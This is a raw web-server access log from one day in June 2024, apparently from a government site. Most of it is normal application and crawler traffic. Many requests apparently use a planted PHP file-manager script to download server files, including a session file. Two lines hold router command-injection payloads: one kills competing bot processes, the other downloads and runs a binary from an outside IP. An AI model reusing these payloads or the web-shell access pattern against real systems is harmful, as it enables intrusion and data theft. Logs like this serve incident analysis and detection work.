186.29.33.66 - - [29/Jun/2024:09:34:41 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1802
172.22.2.4 - - [29/Jun/2024:09:33:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.29.33.66 - - [29/Jun/2024:09:34:42 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1790
186.29.33.66 - - [29/Jun/2024:09:34:46 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1607
47.128.62.172 - - [29/Jun/2024:09:34:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150904-0030-993000.txt&ft=download&white=1 HTTP/1.1" 200 661
201.245.192.253 - - [29/Jun/2024:09:34:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:09:35:11 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1788
66.249.66.13 - - [29/Jun/2024:09:35:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0266.pdf HTTP/1.1" 200 326679
47.128.126.170 - - [29/Jun/2024:09:35:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+701-750&f=00000715.tif&ft=download HTTP/1.1" 200 131064
201.245.192.253 - - [29/Jun/2024:09:35:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.115.172 - - [29/Jun/2024:09:35:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5C&f=media.php&ft=download&white=1 HTTP/1.1" 200 118400
172.22.2.4 - - [29/Jun/2024:09:33:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
186.29.33.66 - - [29/Jun/2024:09:35:43 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 59588
186.29.33.66 - - [29/Jun/2024:09:35:43 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:35:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:35:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:35:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:35:44 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:35:45 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
47.128.115.169 - - [29/Jun/2024:09:35:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=getexcel.php&ft=download&white=1 HTTP/1.1" 200 435
186.29.33.66 - - [29/Jun/2024:09:35:47 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 7798
186.29.33.66 - - [29/Jun/2024:09:35:48 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 24474
186.29.33.66 - - [29/Jun/2024:09:35:51 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 21891
186.29.33.66 - - [29/Jun/2024:09:35:51 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 8087
186.29.33.66 - - [29/Jun/2024:09:35:53 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 7806
186.29.33.66 - - [29/Jun/2024:09:35:53 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 28539
186.29.33.66 - - [29/Jun/2024:09:35:53 -0500] "GET /sipse/faces/javax.faces.resource/spacer/dot_clear.gif?ln=primefaces&v=4.0 HTTP/1.1" 200 42
186.29.33.66 - - [29/Jun/2024:09:35:55 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 44610
186.29.33.66 - - [29/Jun/2024:09:35:56 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 4320
201.245.192.253 - - [29/Jun/2024:09:35:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:35:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.21.239 - - [29/Jun/2024:09:36:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=changelog.php&ft=download&white=1 HTTP/1.1" 200 4829
66.249.66.12 - - [29/Jun/2024:09:36:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3138.pdf HTTP/1.1" 200 400489
186.29.33.66 - - [29/Jun/2024:09:36:13 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 80997
186.29.33.66 - - [29/Jun/2024:09:36:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:09:36:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0149.pdf HTTP/1.1" 200 315749
186.29.33.66 - - [29/Jun/2024:09:36:14 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
186.29.33.66 - - [29/Jun/2024:09:36:14 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
66.249.66.13 - - [29/Jun/2024:09:36:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1271.pdf HTTP/1.1" 200 390711
47.128.16.245 - - [29/Jun/2024:09:36:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=display_change_password.lib.php&ft=download HTTP/1.1" 200 3719
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 58310
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:22 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:22 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:36:24 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 45270
186.29.33.66 - - [29/Jun/2024:09:36:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:36:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.59.78 - - [29/Jun/2024:09:36:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccalculadora2&f=ajax_calculadora.js&ft=download HTTP/1.1" 200 1594
216.245.221.92 - - [29/Jun/2024:09:36:50 -0500] "HEAD / HTTP/1.1" 200 -
186.29.33.66 - - [29/Jun/2024:09:36:50 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1765
186.29.33.66 - - [29/Jun/2024:09:36:53 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1773
186.29.33.66 - - [29/Jun/2024:09:36:57 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1788
201.245.192.253 - - [29/Jun/2024:09:36:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.62.107 - - [29/Jun/2024:09:36:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CCaja+Herramientas+PIGA%5CDoc+Secretaria+General&f=Lineamiento+1+Responsabilidad+y+Autoridad+SIG.pdf&ft=download HTTP/1.1" 200 233443
201.245.192.253 - - [29/Jun/2024:09:37:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35406
201.245.192.253 - - [29/Jun/2024:09:37:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34915
47.128.59.40 - - [29/Jun/2024:09:37:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0798.pdf&ft=download HTTP/1.1" 200 388775
66.249.66.11 - - [29/Jun/2024:09:37:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4315.pdf HTTP/1.1" 200 5014954
66.249.66.11 - - [29/Jun/2024:09:37:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5245.pdf HTTP/1.1" 200 659814
47.128.41.159 - - [29/Jun/2024:09:37:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=5772.pdf&ft=download HTTP/1.1" 200 20135
186.29.33.66 - - [29/Jun/2024:09:37:43 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 58436
186.29.33.66 - - [29/Jun/2024:09:37:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:44 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:44 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
47.128.22.195 - - [29/Jun/2024:09:37:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=ms-default-filters.php&ft=download HTTP/1.1" 200 3872
186.29.33.66 - - [29/Jun/2024:09:37:50 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 80997
186.29.33.66 - - [29/Jun/2024:09:37:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:51 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
186.29.33.66 - - [29/Jun/2024:09:37:51 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 74414
186.29.33.66 - - [29/Jun/2024:09:37:54 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:09:37:54 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 58619
186.29.33.66 - - [29/Jun/2024:09:37:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:55 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:37:55 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
201.245.192.253 - - [29/Jun/2024:09:37:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:37:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.20.22 - - [29/Jun/2024:09:38:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1871.pdf&ft=download&white=1 HTTP/1.1" 200 462503
141.98.83.197 - - [29/Jun/2024:09:38:09 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:09:38:09 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
66.249.66.12 - - [29/Jun/2024:09:38:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2323.pdf HTTP/1.1" 200 469806
186.29.33.66 - - [29/Jun/2024:09:38:39 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 45250
186.29.33.66 - - [29/Jun/2024:09:38:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:38:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:38:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:38:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.22.210 - - [29/Jun/2024:09:38:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2083.pdf&ft=download HTTP/1.1" 200 347815
186.29.33.66 - - [29/Jun/2024:09:38:43 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2149
186.29.33.66 - - [29/Jun/2024:09:38:44 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1781
186.29.33.66 - - [29/Jun/2024:09:38:53 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1612
47.128.99.111 - - [29/Jun/2024:09:38:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=bookmark.php&ft=download HTTP/1.1" 200 13277
201.245.192.253 - - [29/Jun/2024:09:38:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:09:39:03 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2810
186.29.33.66 - - [29/Jun/2024:09:39:04 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1777
186.29.33.66 - - [29/Jun/2024:09:39:08 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 2112
186.29.33.66 - - [29/Jun/2024:09:39:09 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1784
47.128.96.42 - - [29/Jun/2024:09:39:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp%5C&f=sess_etf3r3edtfiut1m5q6mm2qm8h6&ft=download HTTP/1.1" 200 10892
66.249.66.13 - - [29/Jun/2024:09:39:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4044.pdf HTTP/1.1" 200 610809
66.249.66.11 - - [29/Jun/2024:09:39:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2347.pdf HTTP/1.1" 200 475968
66.249.66.13 - - [29/Jun/2024:09:39:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4466.pdf HTTP/1.1" 200 386830
201.245.192.253 - - [29/Jun/2024:09:39:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33395
66.249.66.12 - - [29/Jun/2024:09:39:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3595.pdf HTTP/1.1" 200 460099
66.249.66.12 - - [29/Jun/2024:09:39:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3260.pdf HTTP/1.1" 200 419427
186.29.33.66 - - [29/Jun/2024:09:39:32 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 58713
186.29.33.66 - - [29/Jun/2024:09:39:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:33 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:33 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:39:40 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 81459
186.29.33.66 - - [29/Jun/2024:09:39:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:48 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/listarProyecto.xhtml HTTP/1.1" 200 163
186.29.33.66 - - [29/Jun/2024:09:39:48 -0500] "GET /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 59091
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:49 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 3257
186.29.33.66 - - [29/Jun/2024:09:39:54 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyecto.xhtml HTTP/1.1" 200 45286
186.29.33.66 - - [29/Jun/2024:09:39:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.33.66 - - [29/Jun/2024:09:39:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:09:39:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:39:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.33.66 - - [29/Jun/2024:09:40:00 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1948
201.245.192.253 - - [29/Jun/2024:09:39:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34915
186.29.33.66 - - [29/Jun/2024:09:40:02 -0500] "POST /sipse/faces/presentacion/proyectos/proyecto/proyectoAdministrador/crearAdministrador.xhtml HTTP/1.1" 200 1956
